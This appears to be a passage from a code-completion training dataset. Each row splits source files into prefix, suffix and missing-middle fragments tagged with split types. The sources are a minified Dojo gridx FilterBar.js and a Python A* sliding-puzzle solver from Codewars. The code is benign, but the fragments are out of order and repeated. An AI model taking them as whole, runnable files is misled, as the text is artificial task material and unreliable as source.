}
if(!_27){
this._pointTooltipDelay=window.setTimeout(_3.hitch(this,"_showTooltip",evt,true),this.tooltipDelay);
return;
}
this._tooltip.show(evt);
},_hideTooltip:function(){
var dlg=this._tooltip;
if(!dlg){
return;
}
if(dlg.isMouseOn){
return;
}
if(this._pointTooltipDelay){
window.clearTimeout(this._pointTooltipDelay);
this._pointTooltipDelay=null;
}
dlg.hide();
},_getRuleString:function(_28,_29,_2a){
var _2b,_2a;
if(_28=="isEmpty"){
_2b="";
}else{
if(/^date|^time/i.test(_2a)){
var f=this._formatDate;
if(/^time/i.test(_2a)){
f=this._formatTime;
}
if(_28==="range"){
var tpl=this._nls.rangeTemplate;
_2b=_9.substitute(tpl,[f(_29.start),f(_29.end)]);
}else{
_2b=f(_29);
}
}else{
_2b=_29;
}
}
return "<span style=\"font-style:italic\">"+this._getConditionDisplayName(_28)+"</span> "+_2b;
},_getConditionDisplayName:function(c){
var k=c.charAt(0).toUpperCase()+c.substring(1);
return this._nls["condition"+k];
},_getConditionOptions:function(_2c){
var nls=this._nls;
var _2d=this._conditionOptions=this._conditionOptions||{};
if(!_2d[_2c]){
var arr=[];
_4.forEach(this._getColumnConditions(_2c),function(s){
var k=s.charAt(0).toUpperCase()+s.substring(1);
arr.push({label:nls["condition"+k],value:s});
},this);
_2d[_2c]=arr;
}
return _2d[_2c];
},_getFilterExpression:function(_2e,_2f,_30,_31){
var F=_f;
var dc=this.grid._columnsById[_31].dateParser||this._stringToDate;
var tc=this.grid._columnsById[_31].timeParser||this._stringToTime;
var _32={date:dc,time:tc};
var c=_2f.condition,exp,_33=false,_30=c=="isEmpty"?"string":_30;
if(c==="range"){
var _34=F.value(_2f.value.start,_30),_35=F.value(_2f.value.end,_30),_36=F.column(_31,_30,_32[_30]);
exp=F.and(F.greaterEqual(_36,_34),F.lessEqual(_36,_35));
}else{
if(/^not/.test(c)){
_33=true;
c=c.replace(/^not/g,"");
c=c.charAt(0).toLowerCase()+c.substring(1);
}
exp=F[c](F.column(_31,_30,_32[_30]),c=="isEmpty"?null:F.value(_2f.value,_30));
if(_33){
exp=F.not(exp);
}
} | var d=new Date();
d.setFullYear(parseInt(RegExp.$1));
d.setMonth(parseInt(RegExp.$2)-1);
return d;
},_stringToTime:function(s,_38){
_38=_38||/(\d\d?):(\d\d?):(\d\d?)/;
_38.test(s);
var d=new Date();
d.setHours(parseInt(RegExp.$1));
d.setMinutes(parseInt(RegExp.$2));
d.setSeconds(parseInt(RegExp.$3));
return d;
},_formatDate:function(_39){
var m=_39.getMonth()+1,d=_39.getDate();
return m+"/"+d+"/"+_39.getFullYear();
},_formatTime:function(_3a){
var h=_3a.getHours(),m=_3a.getMinutes();
if(h<10){
h="0"+h;
}
if(m<10){
m="0"+m;
}
return h+":"+m+":00";
},_initFocus:function(){
var _3b=this.grid.focus;
if(_3b){
_3b.registerArea({name:"filterbar_btn",priority:-1,focusNode:this.btnFilter.domNode,doFocus:this._doFocusBtnFilter,scope:this});
_3b.registerArea({name:"filterbar_clear",priority:-0.9,focusNode:this.domNode,doFocus:this._doFocusClearLink,scope:this});
_3b.registerArea({name:"filterbar_close",priority:-0.8,focusNode:this.btnClose,doFocus:this._doFocusBtnClose,scope:this});
}
},_doFocusBtnFilter:function(evt){
this.btnFilter.focus();
if(evt){
_5.stop(evt);
}
return true;
},_doFocusClearLink:function(evt){
this.btnFilter.focus();
var _3c=_b("a[action=\"clear\"]")[0];
if(_3c){
_3c.focus();
if(evt){
_5.stop(evt);
}
return true;
}
return false;
},_doFocusBtnClose:function(evt){
this.btnClose.focus();
if(evt){
_5.stop(evt);
}
return true;
},_doBlur:function(){
return true;
},destroy:function(){
this._filterDialog&&this._filterDialog.destroy();
_6.destroy(this.domNode);
this.inherited(arguments);
}});
}); | return exp;
},_stringToDate:function(s,_37){
_37=_37||/(\d{4})\/(\d\d?)\/(\d\d?)/;
_37.test(s); | random_line_split |
FilterBar.js | //>>built
require({cache:{"url:gridx/templates/FilterBar.html":"<input type=\"button\" data-dojo-type=\"dijit.form.Button\" data-dojo-props=\"\n\ticonClass: 'gridxFilterBarBtnIcon',\n\tlabel: '...',\n\ttitle: '${defineFilter}'\" aria-label='${defineFilter}'\n/><div class=\"gridxFilterBarStatus\"\n\t><span>${noFilterApplied}</span\n\t><span class=\"gridxFilterBarCloseBtn\" tabindex=\"-1\" title=\"${closeFilterBarBtn}\"><span class=\"gridxFilterBarCloseBtnText\">x</span></span\n></div>\n"}});
define("gridx/modules/filter/FilterBar",["dojo/_base/declare","dijit/registry","dojo/_base/lang","dojo/_base/array","dojo/_base/event","dojo/dom-construct","dojo/dom-attr","dojo/dom-class","dojo/string","dojo/parser","dojo/query","../../core/_Module","dojo/text!../../templates/FilterBar.html","dojo/i18n!../../nls/FilterBar","./Filter","./FilterDialog","./FilterConfirmDialog","./FilterTooltip","dijit/TooltipDialog","dijit/popup","dijit/Tooltip","dijit/form/Button"],function(_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c,_d,_e,_f,_10,_11,_12){
return _1(_c,{name:"filterBar",forced:["filter"],getAPIPath:function(){
return {filterBar:this};
},closeFilterBarButton:true,defineFilterButton:true,tooltipDelay:300,maxRuleCount:0,ruleCountToConfirmClearFilter:2,conditions:{string:["equal","contain","startWith","endWith","notEqual","notContain","notStartWith","notEndWith","isEmpty"],number:["equal","greater","less","greaterEqual","lessEqual","notEqual","isEmpty"],date:["equal","before","after","range","isEmpty"],time:["equal","before","after","range","isEmpty"],"boolean":["equal","isEmpty"]},load:function(_13,_14){
var F=_f;
F.before=F.lessEqual;
F.after=F.greaterEqual;
this.closeFilterBarButton=this.arg("closeFilterBarButton")||this.closeFilterBarButton;
this.defineFilterButton=this.arg("defineFilterButton")||this.defineFilterButton;
this.tooltipDelay=this.arg("tooltipDelay")||this.tooltipDelay;
this.maxRuleCount=this.arg("maxRuleCount")||this.maxRuleCount;
this.ruleCountToConfirmClearFilter=this.arg("ruleCountToConfirmClearFilter")||this.ruleCountToConfirmClearFilter;
this.domNode=_6.create("div",{innerHTML:_9.substitute(_d,_e),"class":"gridxFilterBar"});
_a.parse(this.domNode);
_8.toggle(this.domNode,"gridxFilterBarHideCloseBtn",!this.closeFilterBarButton);
this.grid.vLayout.register(this,"domNode","headerNode",-1);
this._nls=_e;
this._initWidgets();
this._initFocus();
this.refresh();
this.connect(this.domNode,"onclick","onDomClick");
this.connect(this.domNode,"onmouseover","onDomMouseOver");
this.connect(this.domNode,"onmousemove","onDomMouseMove");
this.connect(this.domNode,"onmouseout","onDomMouseOut");
this.loaded.callback();
},onDomClick:function(e){
if(!e.target||!e.target.tagName){
return;
}
if(_7.get(e.target,"action")==="clear"){
this.clearFilter();
}else{
if(_8.contains(e.target,"gridxFilterBarCloseBtn")||_8.contains(e.target,"gridxFilterBarCloseBtnText")){
this.hide();
}else{
this.showFilterDialog();
}
}
},onDomMouseMove:function(e){
if(e&&e.target&&(_7.get(e.target,"action")==="clear"||this.btnFilter===dijit.getEnclosingWidget(e.target))){
return;
}
this._showTooltip(e);
},onDomMouseOver:function(e){
},onDomMouseOut:function(e){
window.setTimeout(_3.hitch(this,"_hideTooltip"),10);
},applyFilter:function(_15){
var F=_f,_16=[];
this.filterData=_15;
_4.forEach(_15.conditions,function(_17){
var _18="string";
if(_17.colId){
_18=this.grid.column(_17.colId).dataType();
_16.push(this._getFilterExpression(_17.condition,_17,_18,_17.colId));
}else{
var arr=[];
_4.forEach(this.grid.columns(),function(col){
if(!col.isFilterable()){
return;
}
arr.push(this._getFilterExpression(_17.condition,_17,_18,col.id));
},this);
_16.push(F.or.apply(F,arr));
}
},this);
var _19=(_15.type==="all"?F.and:F.or).apply(F,_16);
this.grid.filter.setFilter(_19);
var _1a=this;
this.model.when({}).then(function(){
_1a._currentSize=_1a.model.size();
_1a._totalSize=_1a.model._cache.size();
_1a._buildFilterState();
});
},confirmToExecute:function(_1b,_1c){
var max=this.ruleCountToConfirmClearFilter;
if(this.filterData&&(this.filterData.conditions.length>=max||max<=0)){
if(!this._cfmDlg){
this._cfmDlg=new _11();
}
this._cfmDlg.execute=_3.hitch(_1c,_1b);
this._cfmDlg.show();
}else{
_1b.apply(_1c);
}
},clearFilter:function(_1d){
if(!_1d){
this.confirmToExecute(_3.hitch(this,"clearFilter",true),this);
}else{
this.filterData=null;
this.grid.filter.setFilter();
this._buildFilterState();
}
},columnMixin:{isFilterable:function(){
return this.grid._columnsById[this.id].filterable!==false;
},setFilterable:function(_1e){
this.grid.filterBar._setFilterable(this.id,_1e);
return this;
},dataType:function(){
return (this.grid._columnsById[this.id].dataType||"string").toLowerCase();
},filterConditions:function(){
return this.grid.filterBar._getColumnConditions(this.id);
}},refresh:function(){
this.btnClose.style.display=this.closeFilterBarButton?"":"none";
this.btnFilter.style.display=this.defineFilterButton?"":"none";
},isVisible:function(){
return this.domNode.style.display!="none";
},show:function(){
this.domNode.style.display="block";
this.grid.vLayout.reLayout();
this.onShow();
},hide:function(){
this.domNode.style.display="none";
this.grid.vLayout.reLayout();
this._hideTooltip();
this.onHide();
},onShow:function(){
},onHide:function(){
},showFilterDialog:function(){
var dlg=this._filterDialog;
if(!dlg){
this._filterDialog=dlg=new _10({grid:this.grid});
}
if(dlg.open){
return;
}
if(!this.filterData){
dlg.setData(this.filterData);
}
dlg.show();
if(this.filterData) |
},uninitialize:function(){
this._filterDialog&&this._filterDialog.destroyRecursive();
this.inherited(arguments);
_6.destroy(this.domNode);
},_getColumnConditions:function(_1f){
var _20,_21;
if(!_1f){
_20=[];
_21="string";
}else{
_20=this.grid._columnsById[_1f].disabledConditions||[];
_21=(this.grid._columnsById[_1f].dataType||"string").toLowerCase();
}
var ret=this.conditions[_21],_22={};
if(!ret){
ret=this.conditions["string"];
}
_4.forEach(_20,function(_23){
_22[_23]=true;
});
ret=_4.filter(ret,function(_24){
return !_22[_24];
});
return ret;
},_setFilterable:function(_25,_26){
var col=this.grid._columnsById[_25];
if(!col){
return;
}
if(col.filterable==!!_26){
return;
}
col.filterable=!!_26;
if(this.filterData){
var d=this.filterData,len=d.conditions.length;
d.conditions=_4.filter(d.conditions,function(c){
return c.colId!=_25;
});
if(len!=d.conditions.length){
this.applyFilter(d);
}
if(this._filterDialog.open){
this._filterDialog.setData(d);
}
}
},_initWidgets:function(){
this.btnFilter=_2.byNode(_b(".dijitButton",this.domNode)[0]);
this.btnClose=_b(".gridxFilterBarCloseBtn",this.domNode)[0];
this.statusNode=_b(".gridxFilterBarStatus",this.domNode)[0].firstChild;
_7.remove(this.btnFilter.focusNode,"aria-labelledby");
},_buildFilterState:function(){
var nls=this._nls;
if(!this.filterData||!this.filterData.conditions.length){
this.statusNode.innerHTML=nls.filterBarMsgNoFilterTemplate;
return;
}
this.statusNode.innerHTML=_9.substitute(nls.filterBarMsgHasFilterTemplate,[this._currentSize,this._totalSize,"items"])+" <a href=\"javascript:void(0);\" action=\"clear\" title=\"Clear filter\">Clear Filter</a>";
this._buildTooltip();
},_buildTooltip:function(){
if(!this._tooltip){
this._tooltip=new _12({grid:this.grid});
}
this._tooltip.buildContent();
},_showTooltip:function(evt,_27){
this._hideTooltip();
if(!this.filterData||!this.filterData.conditions||!this.filterData.conditions.length){
return;
}
if(!_27){
this._pointTooltipDelay=window.setTimeout(_3.hitch(this,"_showTooltip",evt,true),this.tooltipDelay);
return;
}
this._tooltip.show(evt);
},_hideTooltip:function(){
var dlg=this._tooltip;
if(!dlg){
return;
}
if(dlg.isMouseOn){
return;
}
if(this._pointTooltipDelay){
window.clearTimeout(this._pointTooltipDelay);
this._pointTooltipDelay=null;
}
dlg.hide();
},_getRuleString:function(_28,_29,_2a){
var _2b,_2a;
if(_28=="isEmpty"){
_2b="";
}else{
if(/^date|^time/i.test(_2a)){
var f=this._formatDate;
if(/^time/i.test(_2a)){
f=this._formatTime;
}
if(_28==="range"){
var tpl=this._nls.rangeTemplate;
_2b=_9.substitute(tpl,[f(_29.start),f(_29.end)]);
}else{
_2b=f(_29);
}
}else{
_2b=_29;
}
}
return "<span style=\"font-style:italic\">"+this._getConditionDisplayName(_28)+"</span> "+_2b;
},_getConditionDisplayName:function(c){
var k=c.charAt(0).toUpperCase()+c.substring(1);
return this._nls["condition"+k];
},_getConditionOptions:function(_2c){
var nls=this._nls;
var _2d=this._conditionOptions=this._conditionOptions||{};
if(!_2d[_2c]){
var arr=[];
_4.forEach(this._getColumnConditions(_2c),function(s){
var k=s.charAt(0).toUpperCase()+s.substring(1);
arr.push({label:nls["condition"+k],value:s});
},this);
_2d[_2c]=arr;
}
return _2d[_2c];
},_getFilterExpression:function(_2e,_2f,_30,_31){
var F=_f;
var dc=this.grid._columnsById[_31].dateParser||this._stringToDate;
var tc=this.grid._columnsById[_31].timeParser||this._stringToTime;
var _32={date:dc,time:tc};
var c=_2f.condition,exp,_33=false,_30=c=="isEmpty"?"string":_30;
if(c==="range"){
var _34=F.value(_2f.value.start,_30),_35=F.value(_2f.value.end,_30),_36=F.column(_31,_30,_32[_30]);
exp=F.and(F.greaterEqual(_36,_34),F.lessEqual(_36,_35));
}else{
if(/^not/.test(c)){
_33=true;
c=c.replace(/^not/g,"");
c=c.charAt(0).toLowerCase()+c.substring(1);
}
exp=F[c](F.column(_31,_30,_32[_30]),c=="isEmpty"?null:F.value(_2f.value,_30));
if(_33){
exp=F.not(exp);
}
}
return exp;
},_stringToDate:function(s,_37){
_37=_37||/(\d{4})\/(\d\d?)\/(\d\d?)/;
_37.test(s);
var d=new Date();
d.setFullYear(parseInt(RegExp.$1));
d.setMonth(parseInt(RegExp.$2)-1);
return d;
},_stringToTime:function(s,_38){
_38=_38||/(\d\d?):(\d\d?):(\d\d?)/;
_38.test(s);
var d=new Date();
d.setHours(parseInt(RegExp.$1));
d.setMinutes(parseInt(RegExp.$2));
d.setSeconds(parseInt(RegExp.$3));
return d;
},_formatDate:function(_39){
var m=_39.getMonth()+1,d=_39.getDate();
return m+"/"+d+"/"+_39.getFullYear();
},_formatTime:function(_3a){
var h=_3a.getHours(),m=_3a.getMinutes();
if(h<10){
h="0"+h;
}
if(m<10){
m="0"+m;
}
return h+":"+m+":00";
},_initFocus:function(){
var _3b=this.grid.focus;
if(_3b){
_3b.registerArea({name:"filterbar_btn",priority:-1,focusNode:this.btnFilter.domNode,doFocus:this._doFocusBtnFilter,scope:this});
_3b.registerArea({name:"filterbar_clear",priority:-0.9,focusNode:this.domNode,doFocus:this._doFocusClearLink,scope:this});
_3b.registerArea({name:"filterbar_close",priority:-0.8,focusNode:this.btnClose,doFocus:this._doFocusBtnClose,scope:this});
}
},_doFocusBtnFilter:function(evt){
this.btnFilter.focus();
if(evt){
_5.stop(evt);
}
return true;
},_doFocusClearLink:function(evt){
this.btnFilter.focus();
var _3c=_b("a[action=\"clear\"]")[0];
if(_3c){
_3c.focus();
if(evt){
_5.stop(evt);
}
return true;
}
return false;
},_doFocusBtnClose:function(evt){
this.btnClose.focus();
if(evt){
_5.stop(evt);
}
return true;
},_doBlur:function(){
return true;
},destroy:function(){
this._filterDialog&&this._filterDialog.destroy();
_6.destroy(this.domNode);
this.inherited(arguments);
}});
});
| {
dlg.setData(this.filterData);
} | conditional_block |
sliding-puzzle.py | # 1 kyu
# Sliding Puzzle Solver
# https://www.codewars.com/kata/sliding-puzzle-solver/python
import numpy as np
import queue
def compare(a, b):
if a == b:
return 0
if a > b:
return 1
if a < b:
return -1
class Puzzle:
def __init__(self, puzzle):
self.puzzle = np.array(puzzle, dtype=np.object)
self.solved = np.zeros_like(self.puzzle, dtype=int)
self.height, self.width = self.puzzle.shape
self.steps = []
# Build puzzle & solution to compare against:
for i, row in enumerate(self.puzzle):
for j, value in enumerate(row):
self.puzzle[i, j] = Case(value)
self.puzzle[i, j].y, self.puzzle[i, j].x = i, j
self.solved[i, j] = 1 + j + self.width*i
self.solved[-1, -1] = 0
# Create paths for all cases
for row in self.puzzle:
[case.get_paths(self.puzzle) for case in row]
def clear(self):
[case.clear() for case in np.ravel(self.puzzle)]
def find_number(self, n):
for row in self.puzzle:
for node in row:
if node.value == n:
return node
return None
def solve_number(self, destination, number, ignore=None, solve=True):
while destination.value != number:
hole = self.find_number(0)
# Finds the number you want to put in Destination
goto = self.find_number(number)
# Finds which adjacent case we should approach it from
adjacent = goto.best_adjacent(self.puzzle, relative_to=destination)
# Finds the shortest path to the adjacent case
path = hole.astar(self, adjacent, goto, ignore)
# Moves to it
for one, two in zip(path, path[1:]):
self.steps.append(two.value)
one.swap(two)
else:
self.steps.append(goto.value)
path[-1].swap(goto)
if solve:
destination.solved = True
return True
def solve_line(self, line, solutions, helper_cases):
# Give it a line and what you want that line to look like
for case, solution in zip(line[:-2], solutions[:-2]):
self.solve_number(case, solution)
# Now the hard solve with line[-2:] and solutions[-2:]
# Ponemos el 4 y el 3 en un lugar seguro
self.solve_number(helper_cases[2], solutions[-1], solve=False)
self.solve_number(helper_cases[3], solutions[-2], solve=False)
self.solve_number(line[-1], solutions[-2], solve=False)
self.solve_number(helper_cases[0], solutions[-1], solve=False)
if line[-2] != self.find_number(0):
self.solve_number(helper_cases[1], line[-2].value,
ignore=[helper_cases[0], line[-1]], solve=False)
self.solve_number(line[-2], solutions[-2])
self.solve_number(line[-1], solutions[-1])
return True
def smol_solve(self):
# First solves top row & column, etc, until 2x3 block left
# helper_case[0] is below the last case of the row (row+1, -1)
# helper_case[1] is to the left of helper_case[0]
# We want to reduce up to a 2x2 grid
smallest = 2
for i in range(self.height-smallest):
helper_cases = (self.puzzle[i+1, -1], self.puzzle[i+1, -2],
self.puzzle[i+2, -1], self.puzzle[i+2, -2])
self.solve_line(self.puzzle[i, :], self.solved[i, :], helper_cases)
helper_cases = (self.puzzle[-1, i+1], self.puzzle[-2, i+1],
self.puzzle[-1, i+2], self.puzzle[-2, i+2])
self.solve_line(self.puzzle[i+1:, i], self.solved[i+1:, i], helper_cases)
return True
def final_solve(self, fragment, solution):
# Solves a 2x2 puzzle
for i in range(24):
solution = self.puzzle[-3:, -3:].ravel().tolist()[:-1]
solution = [s.value for s in solution]
if sorted(solution) == solution:
# Done
return True
hole = self.find_number(0)
if i < 12:
# 3 loops one way, 3 loops the other one
if hole.y == self.height-1 and hole.x == self.width-1:
guy = self.puzzle[-2, -1]
if hole.y == self.height-2 and hole.x == self.width-1:
guy = self.puzzle[-2, -2]
if hole.y == self.height-2 and hole.x == self.width-2:
guy = self.puzzle[-1, -2]
if hole.y == self.height-1 and hole.x == self.width-2:
guy = self.puzzle[-1, -1]
if i >= 12:
# 3 loops one way, 3 loops the other one
if hole.y == self.height-1 and hole.x == self.width-1:
guy = self.puzzle[-1, -2]
if hole.y == self.height-2 and hole.x == self.width-1:
guy = self.puzzle[-1, -1]
if hole.y == self.height-2 and hole.x == self.width-2:
guy = self.puzzle[-2, -1]
if hole.y == self.height-1 and hole.x == self.width-2:
guy = self.puzzle[-2, -2]
self.steps.append(guy.value)
hole.swap(guy)
# print('couldnt find solution')
self.steps = None
def solve(self):
# Solve it until we only have a 2x2 square on the bottom right
self.smol_solve()
# Solve the 2x2 square (first argument is square, second is solution)
self.final_solve(self.puzzle[-3:, -3:].ravel().tolist(),
self.solved[-3:, -3:].ravel().tolist())
print(self.puzzle)
class Case:
def __init__(self, value):
self.value = value
self.solved = False
self.paths = []
self.distance = np.Infinity
self.back = None
def __gt__(self, other):
return self.distance > other.distance
def __repr__(self):
return str(self.value)
@property
def info(self):
return f'Case w/ value {self.value} at ({self.y}, {self.x}).'
def clear(self):
self.distance = np.Infinity
self.back = None
def swap(self, other):
self.value, other.value = other.value, self.value
self.solved, other.solved = other.solved, self.solved
def get_paths(self, puzzle):
height, width = puzzle.shape
if self.y > 0:
self.paths.append(puzzle[self.y-1, self.x])
if self.y < height-1:
self.paths.append(puzzle[self.y+1, self.x])
if self.x > 0:
self.paths.append(puzzle[self.y, self.x-1])
if self.x < width-1:
self.paths.append(puzzle[self.y, self.x+1])
def best_adjacent(self, puzzle, relative_to):
# y1, x1 = relative_to.y, relative_to.x
possible_paths = []
for path in self.paths:
if not path.solved:
# Changed to distance_to
# OLD: possible_paths.append((abs(y1-path.y)+abs(x1-path.x), path))
| if not possible_paths:
# Error check, shouldn't happen on solvable puzzles
print(f'Could not find any good adjacent cases for {self.y}, {self.x}')
for path in self.paths:
print(f'({path.y}, {path.x}), solved = {path.solved}')
print(puzzle.puzzle)
solution = sorted(possible_paths, key=lambda x: x[0])[0]
return solution[1]
def dijkstra(self, puzzle, destination, number, ignore=None):
'''A* is way more efficient on big maps! Use it instead'''
# Number = the number we want to put in Destination
# Shortest path to position, ignoring the solved cases and the Number
# It has to ignore Number because else it will displace it and fuck it up
# Basically we take the zero to Destination(which will be right next to Number)
ignore = ignore or []
q = queue.PriorityQueue()
self.distance = 0
q.put((0, self))
while not q.empty():
_, case = q.get()
for posib in case.paths:
if posib.back != case:
if posib != number and not posib.solved and posib not in ignore:
if posib.distance > 1+case.distance:
posib.distance = 1+case.distance
posib.back = case
q.put((posib.distance, posib))
node = destination
path = []
while node.back:
path.append(node)
node = node.back
path.append(node)
puzzle.clear()
return list(reversed(path))
def astar(self, puzzle, destination, number, ignore=None):
# MOVING HOLE(SELF) TO DESTINATION
# Number = the number we want to put in Destination
# Shortest path to position, ignoring the solved cases and the Number
# It has to ignore Number because else it will displace it and fuck it up
# Basically we take the zero to Destination(which will be right next to Number)
ignore = ignore or []
q = queue.PriorityQueue()
self.distance = 0
q.put((0, self))
while not q.empty():
_, case = q.get()
if case == destination:
break
for posib in case.paths:
if posib.back != case:
if posib != number and not posib.solved and posib not in ignore:
if posib.distance > 1+case.distance:
posib.distance = 1+case.distance
posib.back = case
q.put((posib.distance_to(destination), posib))
node = destination
path = []
while node.back:
path.append(node)
node = node.back
path.append(node)
puzzle.clear()
return list(reversed(path))
def distance_to(self, other):
return abs(self.y-other.y)+abs(self.x-other.x)
def slide_puzzle(array):
# Code-execution function
puzzle = Puzzle(array)
puzzle.solve()
return puzzle.steps
# TEST CASE
array = [
[4, 1, 3],
[2, 8, 0],
[7, 6, 5],
]
print(slide_puzzle(array)) | possible_paths.append((relative_to.distance_to(path), path))
| random_line_split |
sliding-puzzle.py | # 1 kyu
# Sliding Puzzle Solver
# https://www.codewars.com/kata/sliding-puzzle-solver/python
import numpy as np
import queue
def compare(a, b):
if a == b:
return 0
if a > b:
return 1
if a < b:
return -1
class Puzzle:
def __init__(self, puzzle):
self.puzzle = np.array(puzzle, dtype=np.object)
self.solved = np.zeros_like(self.puzzle, dtype=int)
self.height, self.width = self.puzzle.shape
self.steps = []
# Build puzzle & solution to compare against:
for i, row in enumerate(self.puzzle):
for j, value in enumerate(row):
self.puzzle[i, j] = Case(value)
self.puzzle[i, j].y, self.puzzle[i, j].x = i, j
self.solved[i, j] = 1 + j + self.width*i
self.solved[-1, -1] = 0
# Create paths for all cases
for row in self.puzzle:
[case.get_paths(self.puzzle) for case in row]
def clear(self):
[case.clear() for case in np.ravel(self.puzzle)]
def find_number(self, n):
for row in self.puzzle:
for node in row:
if node.value == n:
return node
return None
def solve_number(self, destination, number, ignore=None, solve=True):
while destination.value != number:
hole = self.find_number(0)
# Finds the number you want to put in Destination
goto = self.find_number(number)
# Finds which adjacent case we should approach it from
adjacent = goto.best_adjacent(self.puzzle, relative_to=destination)
# Finds the shortest path to the adjacent case
path = hole.astar(self, adjacent, goto, ignore)
# Moves to it
for one, two in zip(path, path[1:]):
self.steps.append(two.value)
one.swap(two)
else:
self.steps.append(goto.value)
path[-1].swap(goto)
if solve:
destination.solved = True
return True
def solve_line(self, line, solutions, helper_cases):
# Give it a line and what you want that line to look like
for case, solution in zip(line[:-2], solutions[:-2]):
self.solve_number(case, solution)
# Now the hard solve with line[-2:] and solutions[-2:]
# Ponemos el 4 y el 3 en un lugar seguro
self.solve_number(helper_cases[2], solutions[-1], solve=False)
self.solve_number(helper_cases[3], solutions[-2], solve=False)
self.solve_number(line[-1], solutions[-2], solve=False)
self.solve_number(helper_cases[0], solutions[-1], solve=False)
if line[-2] != self.find_number(0):
self.solve_number(helper_cases[1], line[-2].value,
ignore=[helper_cases[0], line[-1]], solve=False)
self.solve_number(line[-2], solutions[-2])
self.solve_number(line[-1], solutions[-1])
return True
def smol_solve(self):
# First solves top row & column, etc, until 2x3 block left
# helper_case[0] is below the last case of the row (row+1, -1)
# helper_case[1] is to the left of helper_case[0]
# We want to reduce up to a 2x2 grid
smallest = 2
for i in range(self.height-smallest):
helper_cases = (self.puzzle[i+1, -1], self.puzzle[i+1, -2],
self.puzzle[i+2, -1], self.puzzle[i+2, -2])
self.solve_line(self.puzzle[i, :], self.solved[i, :], helper_cases)
helper_cases = (self.puzzle[-1, i+1], self.puzzle[-2, i+1],
self.puzzle[-1, i+2], self.puzzle[-2, i+2])
self.solve_line(self.puzzle[i+1:, i], self.solved[i+1:, i], helper_cases)
return True
def final_solve(self, fragment, solution):
# Solves a 2x2 puzzle
for i in range(24):
solution = self.puzzle[-3:, -3:].ravel().tolist()[:-1]
solution = [s.value for s in solution]
if sorted(solution) == solution:
# Done
return True
hole = self.find_number(0)
if i < 12:
# 3 loops one way, 3 loops the other one
if hole.y == self.height-1 and hole.x == self.width-1:
guy = self.puzzle[-2, -1]
if hole.y == self.height-2 and hole.x == self.width-1:
guy = self.puzzle[-2, -2]
if hole.y == self.height-2 and hole.x == self.width-2:
guy = self.puzzle[-1, -2]
if hole.y == self.height-1 and hole.x == self.width-2:
guy = self.puzzle[-1, -1]
if i >= 12:
# 3 loops one way, 3 loops the other one
if hole.y == self.height-1 and hole.x == self.width-1:
guy = self.puzzle[-1, -2]
if hole.y == self.height-2 and hole.x == self.width-1:
guy = self.puzzle[-1, -1]
if hole.y == self.height-2 and hole.x == self.width-2:
guy = self.puzzle[-2, -1]
if hole.y == self.height-1 and hole.x == self.width-2:
guy = self.puzzle[-2, -2]
self.steps.append(guy.value)
hole.swap(guy)
# print('couldnt find solution')
self.steps = None
def solve(self):
# Solve it until we only have a 2x2 square on the bottom right
self.smol_solve()
# Solve the 2x2 square (first argument is square, second is solution)
self.final_solve(self.puzzle[-3:, -3:].ravel().tolist(),
self.solved[-3:, -3:].ravel().tolist())
print(self.puzzle)
class Case:
def __init__(self, value):
self.value = value
self.solved = False
self.paths = []
self.distance = np.Infinity
self.back = None
def __gt__(self, other):
return self.distance > other.distance
def __repr__(self):
return str(self.value)
@property
def info(self):
return f'Case w/ value {self.value} at ({self.y}, {self.x}).'
def clear(self):
self.distance = np.Infinity
self.back = None
def swap(self, other):
self.value, other.value = other.value, self.value
self.solved, other.solved = other.solved, self.solved
def get_paths(self, puzzle):
|
def best_adjacent(self, puzzle, relative_to):
# y1, x1 = relative_to.y, relative_to.x
possible_paths = []
for path in self.paths:
if not path.solved:
# Changed to distance_to
# OLD: possible_paths.append((abs(y1-path.y)+abs(x1-path.x), path))
possible_paths.append((relative_to.distance_to(path), path))
if not possible_paths:
# Error check, shouldn't happen on solvable puzzles
print(f'Could not find any good adjacent cases for {self.y}, {self.x}')
for path in self.paths:
print(f'({path.y}, {path.x}), solved = {path.solved}')
print(puzzle.puzzle)
solution = sorted(possible_paths, key=lambda x: x[0])[0]
return solution[1]
def dijkstra(self, puzzle, destination, number, ignore=None):
'''A* is way more efficient on big maps! Use it instead'''
# Number = the number we want to put in Destination
# Shortest path to position, ignoring the solved cases and the Number
# It has to ignore Number because else it will displace it and fuck it up
# Basically we take the zero to Destination(which will be right next to Number)
ignore = ignore or []
q = queue.PriorityQueue()
self.distance = 0
q.put((0, self))
while not q.empty():
_, case = q.get()
for posib in case.paths:
if posib.back != case:
if posib != number and not posib.solved and posib not in ignore:
if posib.distance > 1+case.distance:
posib.distance = 1+case.distance
posib.back = case
q.put((posib.distance, posib))
node = destination
path = []
while node.back:
path.append(node)
node = node.back
path.append(node)
puzzle.clear()
return list(reversed(path))
def astar(self, puzzle, destination, number, ignore=None):
# MOVING HOLE(SELF) TO DESTINATION
# Number = the number we want to put in Destination
# Shortest path to position, ignoring the solved cases and the Number
# It has to ignore Number because else it will displace it and fuck it up
# Basically we take the zero to Destination(which will be right next to Number)
ignore = ignore or []
q = queue.PriorityQueue()
self.distance = 0
q.put((0, self))
while not q.empty():
_, case = q.get()
if case == destination:
break
for posib in case.paths:
if posib.back != case:
if posib != number and not posib.solved and posib not in ignore:
if posib.distance > 1+case.distance:
posib.distance = 1+case.distance
posib.back = case
q.put((posib.distance_to(destination), posib))
node = destination
path = []
while node.back:
path.append(node)
node = node.back
path.append(node)
puzzle.clear()
return list(reversed(path))
def distance_to(self, other):
return abs(self.y-other.y)+abs(self.x-other.x)
def slide_puzzle(array):
# Code-execution function
puzzle = Puzzle(array)
puzzle.solve()
return puzzle.steps
# TEST CASE
array = [
[4, 1, 3],
[2, 8, 0],
[7, 6, 5],
]
print(slide_puzzle(array))
| height, width = puzzle.shape
if self.y > 0:
self.paths.append(puzzle[self.y-1, self.x])
if self.y < height-1:
self.paths.append(puzzle[self.y+1, self.x])
if self.x > 0:
self.paths.append(puzzle[self.y, self.x-1])
if self.x < width-1:
self.paths.append(puzzle[self.y, self.x+1]) | identifier_body |
sliding-puzzle.py | # 1 kyu
# Sliding Puzzle Solver
# https://www.codewars.com/kata/sliding-puzzle-solver/python
import numpy as np
import queue
def compare(a, b):
if a == b:
return 0
if a > b:
return 1
if a < b:
return -1
class Puzzle:
def __init__(self, puzzle):
self.puzzle = np.array(puzzle, dtype=np.object)
self.solved = np.zeros_like(self.puzzle, dtype=int)
self.height, self.width = self.puzzle.shape
self.steps = []
# Build puzzle & solution to compare against:
for i, row in enumerate(self.puzzle):
for j, value in enumerate(row):
self.puzzle[i, j] = Case(value)
